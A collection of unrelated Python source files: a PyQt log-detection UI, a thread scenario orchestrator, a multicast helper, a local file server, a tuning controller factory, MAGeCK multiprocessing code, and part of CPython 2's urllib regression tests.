# sub_siticher_folders_mask_2 = sub_siticher_folders_2 + '-mask'
# if not os.path.exists(sub_siticher_folders_2):
# os.makedirs(sub_siticher_folders_2)
# if not os.path.exists(sub_siticher_folders_mask_2):
# os.makedirs(sub_siticher_folders_mask_2)
# print(img_paths)
# for img_path_even in img_paths_even:
# filename = img_path_even.split('/')[-1]
# shutil.copy(out_folder + filename, sub_siticher_folders_2 + '/' + filename)
# filename_mask = filename.split('.')[0] + '_mask.png'
# # print(filename_mask)
# shutil.copy(out_folder + filename_mask, sub_siticher_folders_mask_2 + '/' + filename_mask)
# # print(commad)
# file_name_txt = file_name_2 + '-STITCH-GRAPH'
# creat_match_graph_txt(img_count // 2, root_path=sub_siticher_folders_2,
# root_path_mask=sub_siticher_folders_mask_2, file_name=file_name_txt)
#
# commad_2 = commad + ' ' + file_name_2
# cmd = os.system(commad_2)
# if cmd != 0:
# self.textEdit.setText('图片数据有误!' + '\n')
# QApplication.processEvents()
#
# file_name_3 = file_name + '_3'
# sub_siticher_folders_3 = sticher_folder + file_name_3
# sub_siticher_folders_mask_3 = sub_siticher_folders_3 + '-mask'
# if not os.path.exists(sub_siticher_folders_3):
# os.makedirs(sub_siticher_folders_3)
# if not os.path.exists(sub_siticher_folders_mask_3):
# os.makedirs(sub_siticher_folders_mask_3)
# shutil.move(
# sticher_folder + '0_results/' + file_name + '-result' + '/' + file_name + '-[NISwGSP][2D][BLEND_LINEAR].png',
# sub_siticher_folders_3 + '/' + 'out1.png')
#
# shutil.move(
# sticher_folder + '0_results/' + file_name_2 + '-result' + '/' + file_name_2 + '-[NISwGSP][2D][BLEND_LINEAR].png',
# sub_siticher_folders_3 + '/' + 'out2.png')
#
# out_final_mask = [sticher_folder + '0_results/' + file_name + '-mask-result' + '/' + file_name + '-[NISwGSP][2D][BLEND_LINEAR].png',
# sticher_folder + '0_results/' + file_name_2 + '-mask-result' + '/' + file_name_2 + '-[NISwGSP][2D][BLEND_LINEAR].png']
# input_csv_file_list = [out_folder + img_path.split('/')[-1].rstrip('.png') + '.csv' for img_path in img_paths]
# input_img_mask_list = [out_folder + img_path.split('/')[-1] for img_path in img_paths]
# get_final_result_multirows(input_img_mask_list, input_csv_file_list, out_final_mask)
# shutil.copy(os.getcwd() + '/' + 'tmp_merger_final1.png', sub_siticher_folders_mask_3 + '/' + 'out_mask1.png')
# shutil.copy(os.getcwd() + '/' + 'tmp_merger_final2.png', sub_siticher_folders_mask_3 + '/' + 'out_mask2.png')
# file_name_txt = file_name_3 + '-STITCH-GRAPH'
# creat_match_graph_txt(2, root_path=sub_siticher_folders_3,
# root_path_mask=sub_siticher_folders_mask_3, file_name=file_name_txt)
# commad_3 = commad + ' ' + file_name_3
# cmd = os.system(commad_3)
# if cmd != 0:
# self.textEdit.setText('图片数据有误!' + '\n')
# QApplication.processEvents()
# shutil.move(
# sticher_folder + '0_results/' + file_name_3 + '-result' + '/' + file_name_3 + '-[NISwGSP][2D][BLEND_LINEAR].png',
# out_folder + 'out.png')
# shutil.move(
# sticher_folder + '0_results/' + file_name_3 + '-mask-result' + '/' + file_name_3 + '-[NISwGSP][2D][BLEND_LINEAR].png',
# out_folder + 'out_mask.png')
# input_image_list = ['./tmp_merger_final1.png', './tmp_merger_final2.png']
# input_csv_file_list = ['./tmp_merger_final1.csv', './tmp_merger_final2.csv']
# out_final_mask = out_folder + 'out_mask.png'
# log_info = get_final_result(input_image_list, input_csv_file_list, out_final_mask, is_row_format=False)
# if log_info == '正常':
# img, cal_list, count_num = get_result_from_meger_file('./meger_final.csv', out_folder + 'out.png')
# img1 = cv2.imread(out_folder + 'out.png')
# img2 = img
# x = img1.shape[1] # 获取图像大小
# y = img1.shape[0]
# img = cv2.resize(img2, (1100, 550))
# frame = QImage(img, img.shape[1], img.shape[0], QImage.Format_RGB888)
# pix = QPixmap.fromImage(frame)
# self.item = QGraphicsPixmapItem(pix) # 创建像素图元
# # self.item.setScale(self.zoomscale)
# self.scene = QGraphicsScene() # 创建场景
# self.scene.addItem(self.item)
# self.graphicsView_3.setScene(self.scene)
# # self.zoomscale = 1 # 图片放缩尺度
# # frame1 = QImage(img1, x, y, QImage.Format_RGB888)
# # pix1 = QPixmap.fromImage(frame1)
# # self.item1 = QGraphicsPixmapItem(pix1) # 创建像素图元
# # # self.item.setScale(self.zoomscale)
# # self.scene1 = QGraphicsScene() # 创建场景
# # self.scene1.addItem(self.item1)
# #
# # frame2 = QImage(img2, x, y, QImage.Format_RGB888)
# # pix2 = QPixmap.fromImage(frame2)
# # self.item2 = QGraphicsPixmapItem(pix2) # 创建像素图元
# # # self.item.setScale(self.zoomscale)
# # self.scene2 = QGraphicsScene() # 创建场景
# # self.scene2.addItem(self.item2)
# #
# # self.graphicsView.setScene(self.scene1)
# # self.graphicsView_2.setScene(self.scene2)
# self.textEdit.setText("检测木头总的个数:" + str(count_num) + '\n')
# self.textEdit.append('具体的结果保存在results文件夹,以及meger_final.csv中:\n')
# [self.textEdit.append(
# '第' + str(i) + '根木头:\n' + '长轴:' + str(cal_result[0] / 10) + 'cm' + ',' + '\n短轴:' + str(cal_result[1] / 10) + 'cm' + '\n') for
# i, cal_result in enumerate(cal_list)]
# QApplication.processEvents()
# else:
# self.textEdit.setText(str(log_info) + '\n')
# QApplication.processEvents()
else:
self.textEdit.setText("拼接顺序仅支持一/二排,请重新输入!!")
QApplication.processEvents()
def open_file_and_show_img(self):
self.graphicsView_2.setScene(None)
if self.isimage == True:
self.textEdit.setText("开始检测图片,选择要检测的图片,选择前请勾选对应选项如(图片/视频), 且保证存在.tif的深度数据")
file = QFileDialog.getOpenFileName(self, "Open File", "./","Images (*.png *.xpm *.jpg)")
current_filename = file[0]
current_filename = str(current_filename)
self.filename = current_filename
img = cv2.imread(current_filename)
if img is None:
print('读取图片为空!!!')
self.graphicsView_2.setScene(None)
self.graphicsView.setScene(None)
self.textEdit.setText("输入图片为空,请重新输入" + '\n')
else:
self.org_img = img.copy() #得到原始图片
img = cv2.resize(img,(520,520))
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
x = img.shape[1] # 获取图像大小
y = img.shape[0]
self.zoomscale = 1 # 图片放缩尺度
frame = QImage(img, x, y, QImage.Format_RGB888)
pix = QPixmap.fromImage(frame)
self.item = QGraphicsPixmapItem(pix) # 创建像素图元
# self.item.setScale(self.zoomscale)
self.scene = QGraphicsScene() # 创建场景
self.scene.addItem(self.item)
self.graphicsView.setScene(self.scene)
elif self.isvideo == True:
self.textEdit.setText("开始检测视频,选择要检测的视频,选择前请勾选对应选项(图片/视频),仅支持mp4视频")
file = QFileDialog.getOpenFileName(self, "Open File", "./","*.mp4")
current_filename = file[0]
#保存文件路径
self.current_filename = str(current_filename)
self.cap = cv2.VideoCapture(self.current_filename )
self.frameRate = self.cap.get(cv2.CAP_PROP_FPS)
while(self.cap.isOpened()):
# 如果读取成功
success, frame = self.cap.read()
if(success):
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
img_i = frame.copy()
img_i = cv2.resize(img_i, (520, 520))
img_i = cv2.cvtColor(img_i, cv2.COLOR_BGR2RGB)
new_frame = QImage(img_i, img_i.shape[1],img_i.shape[0] , QImage.Format_RGB888)
pix = QPixmap.fromImage(new_frame)
self.item = QGraphicsPixmapItem(pix) # 创建像素图元
# self.item.setScale(self.zoomscale)
self.scene = QGraphicsScene() # 创建场景
self.scene.addItem(self.item)
self.graphicsView.setScene(self.scene)
cv2.waitKey(1)
break
else:
break
self.cap.release()
elif self.ismulti == True:
self.textEdit.setText("选择要检测的所有帧的文件夹,开始多帧融合并检测,请确保每帧是按顺序编号,选择前请勾选对应选项(图片/视频/多帧图像),保证tif深度数据存在同一个文件夹中")
file = QFileDialog.getExistingDirectory(self,
"选取文件夹",
"./") #起始路径
#print(file)
directory = file
if directory is '':
self.textEdit.setText("选择文件夹有误,请重新选择" + '\n')
QApplication.processEvents()
else:
#print('directory:', directory)
filenames = os.listdir(directory)
filenames_new = []
filenames_raw = []
for filename in filenames:
if 'tif' in filename:
filenames_raw.append(filename)
continue
if 'depth' in filename:
continue
filenames_new.append(filename)
filenames_new = sorted(filenames_new, key = lambda x: int(x[:-4]))
print('filename:', filenames_new)
filenames_raw = sorted(filenames_raw, key = lambda x: int(x[:-10]))
#print('filenames:', filenames)
img_list = [directory + '/' + filename for filename in filenames_new]
img_list_raw = [directory + '/' + filename for filename in filenames_raw]
self.img_list = img_list
self.img_list_raw = img_list_raw
#在指定图窗上显示特定的图像
def show_img_in_graphics(self,img,graphicsView):
pass
# if __name__=="__main__" and config.DEBUG:
# import sys
# print("hello world")
# # cap = cv2.VideoCapture('./1.mp4')
# # frameRate = cap.get(cv2.CAP_PROP_FPS)
# # while cap.isOpened():
# # success, frame = cap.read()
# # if(success):
# # print(frame.shape)
#
# app = QApplication(sys.argv)
# w = Detection_Ui()
#
# w.show()
# #if w.ismulti == True:
# sys.exit(app.exec_())
|
meta_scenario.py
|
"""I offer a function that is run in a Thread to orchestrate the nodes"""
import codecs
import threading
from threading import Thread
from binascii import b2a_hex
from os import urandom
from queue import Queue
from time import sleep
# pylint: disable=broad-except
# pylint: disable=global-statement
from .project_logger import set_up_logging
SLAVES_SYNC = Queue()
SETTINGS_SYNC = Queue()
LOG = set_up_logging(__name__)
def update_settings_blocking():
LOG.info('Waiting for new settings')
settings = SETTINGS_SYNC.get()
sleep(5) # wait in case there are multiple updates
while not SETTINGS_SYNC.empty():
settings = SETTINGS_SYNC.get()
return settings['nodes'], settings['repetitions']
def update_settings_if_available(current_settings, current_reps):
LOG.info('Waiting for new settings')
while not SETTINGS_SYNC.empty():
settings = SETTINGS_SYNC.get()
current_settings, current_reps = settings['nodes'], settings['repetitions']
return current_settings, current_reps
def run_scenario():
"""I dispatch scenario thread according to the defined scenario and stop it if new settings
arrive from the controller"""
current_slaves = []
current_scenario = Scenario()
while True:
try:
LOG.info("Current slaves %s", current_slaves)
current_slaves = update_current_slaves(current_slaves)
configs, repetitions = update_settings_blocking()
LOG.info(configs)
while len(current_slaves) < len(configs):
LOG.warning('Config and slaves are unequal. slaves: %s, config %s',
current_slaves, configs)
current_slaves = update_current_slaves(current_slaves)
configs, repetitions = update_settings_if_available(configs, repetitions)
sleep(5)
current_scenario.stop()
sleep(5) # let everything settle
current_scenario = Scenario().start(current_slaves, configs, repetitions)
except Exception as exception:
LOG.error("---!!! Unexpected exception occurred %s", exception)
def update_current_slaves(current_slaves):
current_slaves = [slave for slave in current_slaves if slave.is_alive()]
LOG.debug(current_slaves)
if not SLAVES_SYNC.empty():
while not SLAVES_SYNC.empty():
current_slaves = SLAVES_SYNC.get()
return current_slaves
class Scenario:
"""
I encapsulate a scenario thread. I tell the slaves that are associated with me what to do.
"""
def __init__(self):
self.is_running = False
def __run_transactions(self, slave, config, repetitions):
LOG.info('Started transactions in Thread %s id: %d', config['name'], threading.get_ident())
transactions = config['transactions']
while repetitions > 0:
repetitions -= 1
for transaction in transactions:
sleep(transaction['delta'])
if not self.is_running:
LOG.info('terminating thread %s %d', config['name'], threading.get_ident())
return
size_bytes = transaction['size']
quantity = transaction['quantity']
for _ in range(quantity):
try:
filler_data = codecs.decode(b2a_hex(urandom(size_bytes)))
slave.transact(config['name'], filler_data)
LOG.info('Completed transaction in Thread %s %d with delta %d',
config['name'],
threading.get_ident(), transaction['delta'])
except Exception as error:
LOG.exception('In %s, error %s', config['name'], error)
LOG.info('Finished one repetition %d left in %s', repetitions, config['name'])
LOG.info('Finished repetitions in %s %d', config['name'], threading.get_ident())
def start(self, current_slaves, configs, repetitions):
self.is_running = True
for slave, config in zip(current_slaves, configs):
thread = Thread(target=self.__run_transactions, args=[slave, config, repetitions])
thread.start()
return self
def stop(self):
self.is_running = False
|
multicast.py
|
import socket
from socket import error as socket_error
import struct
import threading
import time
import app_ui as ui
global host_name, verbose_mode, multicast_group_ip, multicast_port, timeout_in_seconds, multicast_group, num_times, no_keys, msg_delay
global responses, background_threads
responses = {}
background_threads = []
def begin(host_name_, verbose_mode_=False, multicast_group_ip_=None, multicast_port_=None, timeout_in_seconds_=None, num_times_=None, msg_delay_=None):
global host_name, verbose_mode, multicast_group_ip, multicast_port, timeout_in_seconds, multicast_group, num_times, no_keys, msg_delay
host_name = host_name_
verbose_mode = verbose_mode_
multicast_group_ip = multicast_group_ip_ or '224.3.29.71'
multicast_port = multicast_port_ or 10000
timeout_in_seconds = timeout_in_seconds_ or 0.1
num_times = num_times_ or 15
no_keys = False
msg_delay = msg_delay_ or 0.001
multicast_group = (multicast_group_ip, multicast_port)
ui.begin(verbose_mode)
def conclude():
wait_for_active_threads()
def broadcast(message, regex=None):
message = create_key(message, regex)
send_background_message(message)
def received():
return responses
# ========================================
def create_key(message, regex=None):
key = []
key.append(host_name)
key.append(str(time.time()))
if regex:
key.append(regex)
keystr = "/".join(key)
return keystr + ";" + message
# ========================================
def cast_socket():
# Create the datagram socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Set a timeout so the socket does not block indefinitely when trying
# to receive data.
sock.settimeout(timeout_in_seconds)
# Set the time-to-live for messages to 1 so they do not go past the
# local network segment.
ttl = struct.pack('b', 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, ttl)
return sock
def send_socket_message(sock, message, times):
global responses
responses = {}
for n in range(0, times):
ui.report_verbose('sending "%s"' % message)
sent = sock.sendto(message, multicast_group)
while True:
try:
data, server = sock.recvfrom(256)
except socket.timeout:
break
ip = server[0].strip("'")
responses[ip] = data
ui.report_verbose('received "%s" from %s' % (data, ip))
if n < (times - 1):
time.sleep(msg_delay * (2 ** n))
def send_message(message):
sock = cast_socket()
send_socket_message(sock, message, num_times)
sock.close()
def handle_background_message(message):
send_message(message)
thread = threading.current_thread()
background_threads.remove(thread)
ui.report_verbose("terminating thread: " + str(thread))
def send_background_message(message):
thread = threading.Thread(target=handle_background_message, args=(message, ))
ui.report_verbose("new thread: " + str(thread))
background_threads.append(thread)
thread.start()
def wait_for_active_threads():
if(len(background_threads) > 0):
ui.report_warn("waiting for active threads to terminate...")
for t in background_threads:
t.join()
############################################################################
############################################################################
#if __name__ == '__main__':
# setup()
# try:
# run()
# except KeyboardInterrupt:
# pass
# sys.exit("\nExiting...\n")
#
# finally:
# wait_for_active_threads()
# conclude()
# sys.exit("\nExiting...\n")
|
FileServer.py
|
from SimpleHTTPServer import SimpleHTTPRequestHandler
from os.path import join
from SocketServer import TCPServer, ThreadingMixIn
import threading
HTTP_PORT = 14563
class CustomHandler(SimpleHTTPRequestHandler):
def log_message(self, format, *args):
pass
def translate_path(self, target):
target = target[1:] if target.startswith('/') else target
return join('javaws_app', target)
class FileServer(ThreadingMixIn, TCPServer):
allow_reuse_address = True
def __init__(self):
pass
def start(self):
TCPServer.__init__(self, ('localhost', int(HTTP_PORT)), CustomHandler)
server_thread = threading.Thread(target=self.serve_forever)
server_thread.daemon = True
server_thread.start()
def stop(self):
self.server_close()
print "Server stopped"
|
controller.py
|
import queue
import socket
import threading
import time
from manta_lab.tuning.internal.integrations import (
BayesianController,
ChocolateController,
HyperbandController,
HyperOptController,
OptunaController,
RayController,
SkOptController,
)
class ControllerFactory:
@staticmethod
def create(request):
name = request["algorithm"]["name"]
if name in ["tpe", "multivariate-tpe", "cmaes", "random"]:
return OptunaController()
elif name in ["bayesian"]:
return BayesianController()
elif name in ["choco-grid", "choco-random", "choco-quasirandom", "choco-bayesian", "choco-mocmaes"]:
return ChocolateController()
elif name in ["hyperband"]:
return HyperbandController()
elif name in ["hyperopt-tpe", "hyperopt-random"]:
return HyperOptController()
elif name in ["ray"]: # Too many integrations here. need to get algorithm name in other param
return RayController()
elif name in []:
return SkOptController()
else:
raise AttributeError("Wrong Algorithm name")
# TODO: this will be refactor later
class ControllerSerivce:
def __init__(self, tune_id):
self._tune_id = tune_id
self._jobs = {}
self._queue = queue.Queue()
self._exit_flag = False
self._start_time = time.time()
self._controller_id = None
def _register_controller(self):
"""Tell server controller starts running.
tune_id, host, thread or process id
"""
controller = self._api.register_controller(host=socket.gethostname(), tune_id=self._tune_id, process_id=123)
self._controller_id = controller["id"]
def _setup(self, req):
self._register_controller()
self._controller = ControllerFactory.create(req)
def _thread_body(self):
while True:
if self._exit_flag:
return
requests = self._read_requests_from_queue()
for req in requests:
jobs = controller.create_jobs(req)
self._publish_agent(jobs)
def _publish_agent(self, jobs):
pass
def _read_requests_from_queue(self):
return []
def run(self, req):
print("Starting tune controller: tune_id={}".format(self._tune_id))
self._setup(req)
self._thread_body()
# self._tuner_thread = threading.Thread(target=self._thread_body)
# self._tuner_thread.daemon = True
# self._tuner_thread.name = f"controller_thread({self._tune_id})"
# self._tuner_thread.start()
if __name__ == "__main__":
req = {
"algorithm": {
"name": "tpe",
"metric": {"name": "accuracy", "goal": "maximize"},
"settings": {"n_startup_trials": 1},
},
"parameters": {
"a": {"values": [1, 2, 3, 4]},
"b": {"type": "integer", "min": 0, "max": 10},
"c": {"type": "float", "min": -5, "max": 5},
"d": {"values": [1, 2, 3, 4]},
},
}
controller = ControllerFactory.create(req)
job = controller.create_jobs(req)
req2 = {
"previous_jobs": [
{
"id": job[0][0],
"metric": 10,
"parameters": job[0][1],
}
],
}
req2.update(req)
job2 = controller.create_jobs(req2)
controller.create_jobs(req)
|
mlemultiprocessing.py
|
'''
MAGeCK MLE multiprocessing
'''
from __future__ import print_function
import re
import sys
import logging
import multiprocessing
import copy
import numpy as np
from mageck.mleem import iteratenbem
# debug
try:
from IPython.core.debugger import Tracer
except:
pass
def thread_p_func(dinst,args,iteratenbemargs,returndict):
'''
functions for multithreading
Parameters:
dist
A dictionary of instances
iteratenbemargs
A dictionary of arguments in iteratenbem() function
'''
name = multiprocessing.current_process().name
ngene=0
logging.info(name+': total '+str(len(dinst))+ ' instances.')
for (tgid,tginst) in dinst.iteritems():
if ngene % 1000 ==1 or args.debug:
logging.info(name+': Calculating '+tgid+' ('+str(ngene)+') ... ')
iteratenbem(tginst,**iteratenbemargs)
returndict[tgid]=tginst
ngene+=1
def runem_multiproc(allgenedict,args,nproc=1, argsdict={}):
'''
Calling iternatembem using different number of threads
Arguments:
allgenedict:
a dictionary of all gene instances
args:
arguments
nproc
The number of threads
argsdict
Positional arguments for iteratenbem
'''
# separate dicts
instdictlist=[]
mnger=multiprocessing.Manager()
retdict=mnger.dict()
if nproc==1:
instdictlist.append(allgenedict)
elif nproc<=0:
logging.error('Error: incorrect number of threads.')
sys.exit(-1)
else:
ngene=0
instdictlist=[]
for i in range(nproc):
instdictlist.append({})
for (tgid,tginst) in allgenedict.iteritems():
targetlistid=ngene %nproc
instdictlist[targetlistid][tgid]=tginst
ngene+=1
# start jobs
jobs=[]
for i in range(nproc):
j=multiprocessing.Process(target=thread_p_func, name='Thread '+str(i),args=(instdictlist[i],args,argsdict,retdict))
jobs.append(j)
j.start()
logging.info(j.name+' started.')
for jj in jobs:
jj.join()
logging.info(jj.name+' completed.')
logging.info('All threads completed.')
# save the instance
# Tracer()()
for tgid in retdict.keys():
tginst=retdict[tgid]
allgenedict[tgid]=tginst
def iteratenbem_permutation(genedict,args,debug=True,nround=100,removeoutliers=False,size_factor=None):
'''
Perform permutation test
'''
logging.info('Start permuting '+str(nround)+' rounds ...')
allsg=[]
desmat=genedict[genedict.keys()[0]].design_mat
nbeta1=desmat.shape[1]-1
ngene=len(genedict)
for (geneid, geneinst) in genedict.iteritems():
nsg=geneinst.nb_count.shape[1]
nsample=geneinst.nb_count.shape[0]
countmat=geneinst.nb_count.getT()
sgitem=[(geneinst.w_estimate[i],countmat[i]) for i in range(nsg)]
allsg+=sgitem
logging.info('Collecting '+str(len(allsg))+' sgRNAs from '+str(ngene)+' genes.')
#
genedictcopy=copy.deepcopy(genedict)
betazeros=np.zeros((nround*ngene,nbeta1))
#
betaz_id=0
for nrd in range(nround):
np.random.shuffle(allsg)
#
logging.info('Permuting round '+str(nrd)+' ...')
nid=0
for (geneid, geneinst) in genedictcopy.iteritems():
nsg=geneinst.nb_count.shape[1]
nsample=geneinst.nb_count.shape[0]
selitem=allsg[nid:nid+nsg]
countmat=np.vstack([x[1] for x in selitem])
w_es=np.array([x[0] for x in selitem])
geneinst.nb_count=countmat.getT()
geneinst.w_estimate=w_es
nid+=nsg
# end gene loop
#iteratenbem(geneinst,debug=False,estimateeff=True,updateeff=False,removeoutliers=removeoutliers,size_factor=size_factor,logem=False)
argsdict={'debug':False,'estimateeff':True,'updateeff':False,'removeoutliers':removeoutliers,'size_factor':size_factor,'logem':False}
runem_multiproc(genedictcopy,args,nproc=args.threads,argsdict=argsdict)
for (geneid, geneinst) in genedictcopy.iteritems():
nsg=geneinst.nb_count.shape[1]
beta_es=geneinst.beta_estimate[nsg:]
betazeros[betaz_id,:]=beta_es
betaz_id+=1
# end gene loop
# end permutation
logging.info('Assigning p values...')
ncompare=betazeros.shape[0]*1.0
for (geneid, geneinst) in genedict.iteritems():
nsg=geneinst.nb_count.shape[1]
beta_es=geneinst.beta_estimate[nsg:]
cp_u0=np.sum(betazeros>beta_es,axis=0)
cp_u1=np.sum(betazeros<beta_es,axis=0)
cp_ustack=np.vstack((cp_u0/ncompare,cp_u1/ncompare))
cp_minval=np.min(cp_ustack,axis=0)
#cp_minvec=np.array(cp_minval)[0]
cp_minvec=cp_minval*2
geneinst.beta_permute_pval=cp_minvec
geneinst.beta_permute_pval_neg=cp_ustack[1]
geneinst.beta_permute_pval_pos=cp_ustack[0]
# Tracer()()
return betazeros
|
test_urllib.py
|
"""Regression tests for urllib"""
import collections
import urllib
import httplib
import io
import unittest
import os
import sys
import mimetools
import tempfile
from test import test_support
from base64 import b64encode
def hexescape(char):
"""Escape char as RFC 2396 specifies"""
hex_repr = hex(ord(char))[2:].upper()
if len(hex_repr) == 1:
hex_repr = "0%s" % hex_repr
return "%" + hex_repr
def fakehttp(fakedata):
class FakeSocket(io.BytesIO):
def sendall(self, data):
FakeHTTPConnection.buf = data
def makefile(self, *args, **kwds):
return self
def read(self, amt=None):
if self.closed:
return b""
return io.BytesIO.read(self, amt)
def readline(self, length=None):
if self.closed:
return b""
return io.BytesIO.readline(self, length)
class FakeHTTPConnection(httplib.HTTPConnection):
# buffer to store data for verification in urlopen tests.
buf = ""
def connect(self):
self.sock = FakeSocket(self.fakedata)
self.__class__.fakesock = self.sock
FakeHTTPConnection.fakedata = fakedata
return FakeHTTPConnection
class FakeHTTPMixin(object):
def fakehttp(self, fakedata):
assert httplib.HTTP._connection_class == httplib.HTTPConnection
httplib.HTTP._connection_class = fakehttp(fakedata)
def unfakehttp(self):
httplib.HTTP._connection_class = httplib.HTTPConnection
class urlopen_FileTests(unittest.TestCase):
"""Test urlopen() opening a temporary file.
Try to test as much functionality as possible so as to cut down on reliance
on connecting to the Net for testing.
"""
def setUp(self):
"""Setup of a temp file to use for testing"""
self.text = "test_urllib: %s\n" % self.__class__.__name__
FILE = file(test_support.TESTFN, 'wb')
try:
FILE.write(self.text)
finally:
FILE.close()
self.pathname = test_support.TESTFN
self.returned_obj = urllib.urlopen("file:%s" % self.pathname)
def tearDown(self):
"""Shut down the open object"""
self.returned_obj.close()
os.remove(test_support.TESTFN)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines", "fileno",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertTrue(hasattr(self.returned_obj, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_read(self):
self.assertEqual(self.text, self.returned_obj.read())
def test_readline(self):
self.assertEqual(self.text, self.returned_obj.readline())
self.assertEqual('', self.returned_obj.readline(),
"calling readline() after exhausting the file did not"
" return an empty string")
def test_readlines(self):
lines_list = self.returned_obj.readlines()
self.assertEqual(len(lines_list), 1,
"readlines() returned the wrong number of lines")
self.assertEqual(lines_list[0], self.text,
"readlines() returned improper text")
def test_fileno(self):
file_num = self.returned_obj.fileno()
self.assertIsInstance(file_num, int, "fileno() did not return an int")
self.assertEqual(os.read(file_num, len(self.text)), self.text,
"Reading on the file descriptor returned by fileno() "
"did not return the expected text")
def test_close(self):
# Test close() by calling it hear and then having it be called again
# by the tearDown() method for the test
self.returned_obj.close()
def test_info(self):
self.assertIsInstance(self.returned_obj.info(), mimetools.Message)
def test_geturl(self):
self.assertEqual(self.returned_obj.geturl(), self.pathname)
def test_getcode(self):
self.assertEqual(self.returned_obj.getcode(), None)
def test_iter(self):
# Test iterator
# Don't need to count number of iterations since test would fail the
# instant it returned anything beyond the first line from the
# comparison
for line in self.returned_obj.__iter__():
self.assertEqual(line, self.text)
def test_relativelocalfile(self):
self.assertRaises(ValueError,urllib.urlopen,'./' + self.pathname)
class ProxyTests(unittest.TestCase):
def setUp(self):
# Records changes to env vars
self.env = test_support.EnvironmentVarGuard()
# Delete all proxy related env vars
for k in os.environ.keys():
if 'proxy' in k.lower():
self.env.unset(k)
def tearDown(self):
# Restore all proxy related env vars
self.env.__exit__()
del self.env
def test_getproxies_environment_keep_no_proxies(self):
self.env.set('NO_PROXY', 'localhost')
proxies = urllib.getproxies_environment()
# getproxies_environment use lowered case truncated (no '_proxy') keys
self.assertEqual('localhost', proxies['no'])
# List of no_proxies with space.
self.env.set('NO_PROXY', 'localhost, anotherdomain.com, newdomain.com:1234')
self.assertTrue(urllib.proxy_bypass_environment('anotherdomain.com'))
self.assertTrue(urllib.proxy_bypass_environment('anotherdomain.com:8888'))
self.assertTrue(urllib.proxy_bypass_environment('newdomain.com:1234'))
def test_proxy_cgi_ignore(self):
try:
self.env.set('HTTP_PROXY', 'http://somewhere:3128')
proxies = urllib.getproxies_environment()
self.assertEqual('http://somewhere:3128', proxies['http'])
self.env.set('REQUEST_METHOD', 'GET')
proxies = urllib.getproxies_environment()
self.assertNotIn('http', proxies)
finally:
self.env.unset('REQUEST_METHOD')
self.env.unset('HTTP_PROXY')
def test_proxy_bypass_environment_host_match(self):
bypass = urllib.proxy_bypass_environment
self.env.set('NO_PROXY',
'localhost, anotherdomain.com, newdomain.com:1234, .d.o.t')
self.assertTrue(bypass('localhost'))
self.assertTrue(bypass('LocalHost')) # MixedCase
self.assertTrue(bypass('LOCALHOST')) # UPPERCASE
self.assertTrue(bypass('newdomain.com:1234'))
self.assertTrue(bypass('foo.d.o.t')) # issue 29142
self.assertTrue(bypass('anotherdomain.com:8888'))
self.assertTrue(bypass('www.newdomain.com:1234'))
self.assertFalse(bypass('prelocalhost'))
self.assertFalse(bypass('newdomain.com')) # no port
self.assertFalse(bypass('newdomain.com:1235')) # wrong port
class ProxyTests_withOrderedEnv(unittest.TestCase):
def setUp(self):
# We need to test conditions, where variable order _is_ significant
self._saved_env = os.environ
# Monkey patch os.environ, start with empty fake environment
os.environ = collections.OrderedDict()
def tearDown(self):
os.environ = self._saved_env
def test_getproxies_environment_prefer_lowercase(self):
# Test lowercase preference with removal
os.environ['no_proxy'] = ''
os.environ['No_Proxy'] = 'localhost'
self.assertFalse(urllib.proxy_bypass_environment('localhost'))
self.assertFalse(urllib.proxy_bypass_environment('arbitrary'))
os.environ['http_proxy'] = ''
os.environ['HTTP_PROXY'] = 'http://somewhere:3128'
proxies = urllib.getproxies_environment()
self.assertEqual({}, proxies)
# Test lowercase preference of proxy bypass and correct matching including ports
os.environ['no_proxy'] = 'localhost, noproxy.com, my.proxy:1234'
os.environ['No_Proxy'] = 'xyz.com'
self.assertTrue(urllib.proxy_bypass_environment('localhost'))
self.assertTrue(urllib.proxy_bypass_environment('noproxy.com:5678'))
self.assertTrue(urllib.proxy_bypass_environment('my.proxy:1234'))
self.assertFalse(urllib.proxy_bypass_environment('my.proxy'))
self.assertFalse(urllib.proxy_bypass_environment('arbitrary'))
# Test lowercase preference with replacement
os.environ['http_proxy'] = 'http://somewhere:3128'
os.environ['Http_Proxy'] = 'http://somewhereelse:3128'
proxies = urllib.getproxies_environment()
self.assertEqual('http://somewhere:3128', proxies['http'])
class urlopen_HttpTests(unittest.TestCase, FakeHTTPMixin):
"""Test urlopen() opening a fake http connection."""
def test_read(self):
self.fakehttp('Hello!')
try:
fp = urllib.urlopen("http://python.org/")
self.assertEqual(fp.readline(), 'Hello!')
self.assertEqual(fp.readline(), '')
self.assertEqual(fp.geturl(), 'http://python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_url_fragment(self):
# Issue #11703: geturl() omits fragments in the original URL.
url = 'http://docs.python.org/library/urllib.html#OK'
self.fakehttp('Hello!')
try:
fp = urllib.urlopen(url)
self.assertEqual(fp.geturl(), url)
finally:
self.unfakehttp()
def test_read_bogus(self):
# urlopen() should raise IOError for many error codes.
self.fakehttp('''HTTP/1.1 401 Authentication Required
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
try:
self.assertRaises(IOError, urllib.urlopen, "http://python.org/")
finally:
self.unfakehttp()
@unittest.skipIf(sys.platform == 'cli', 'https://github.com/IronLanguages/main/issues/1626')
def test_invalid_redirect(self):
# urlopen() should raise IOError for many error codes.
self.fakehttp("""HTTP/1.1 302 Found
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Location: file:README
Connection: close
Content-Type: text/html; charset=iso-8859-1
""")
try:
msg = "Redirection to url 'file:"
with self.assertRaisesRegexp(IOError, msg):
urllib.urlopen("http://python.org/")
finally:
self.unfakehttp()
def test_redirect_limit_independent(self):
# Ticket #12923: make sure independent requests each use their
# own retry limit.
for i in range(urllib.FancyURLopener().maxtries):
self.fakehttp(b'''HTTP/1.1 302 Found
